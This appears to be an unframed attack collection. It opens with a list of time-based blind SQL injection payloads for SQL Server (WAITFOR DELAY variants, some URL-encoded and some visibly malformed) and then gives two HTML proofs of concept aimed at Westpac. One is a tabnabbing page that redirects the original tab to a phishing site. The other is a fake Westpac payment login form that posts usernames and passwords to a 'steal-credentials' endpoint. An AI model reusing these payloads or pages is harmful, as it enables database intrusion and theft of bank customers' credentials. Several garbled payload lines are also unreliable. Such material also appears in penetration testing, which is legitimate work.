0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)/* OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- */
R(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0))-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0) AND 5=5)-- 

WAITFOR DELAY '00:00:05'-- 
WAITFOR DELAY '00:00:05' OR ''=' OR WAITFOR DELAY '00:00:05'-- 
%2c(SELECT%35%5FROM%5(SELECT WAITFOR DELAY '00:00:05'))a 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))v 
(SELECT WAITFOR DELAY '00:00:05') 
'%2b(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a)%2b' 
,(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
DESC%2C(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
-1' OR 1+1=3d((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 
-1' OR 1=1+((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 

(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY# 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY-- 
''+(SELECT (FROM (SELECT WAITFOR DELAY '00:00:05'))a)+'' 

(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))/*+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))*/ 
'',)+/test/%26%26%09WAITFOR DELAY '00:00:05'%09-- 




<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Tabnabbing PoC</title>
</head>
<body>
    <h1>Welcome to our site!</h1>
    <p>Click the link below to visit the Westpac payment site.</p>
    <a href="https://payments.corp-uat2.westpac.com" target="_blank" id="example-link">Visit Westpac Payment Site</a>

    <script>
        // After a delay, change the location of the current tab
        setTimeout(function() {
            window.location.href = 'https://phishing-site.com'; // URL of the phishing page
        }, 5000); // 5 seconds delay
    </script>
</body>
</html>




<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Westpac Payment Login</title>
</head>
<body>
    <h1>Login to Westpac Payment</h1>
    <form action="https://phishing-site.com/steal-credentials" method="POST">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username"><br><br>
        <label for="password">Password:</label>
        <input type="password" id="password" name="password"><br><br>
        <button type="submit">Login</button>
    </form>
</body>
</html>


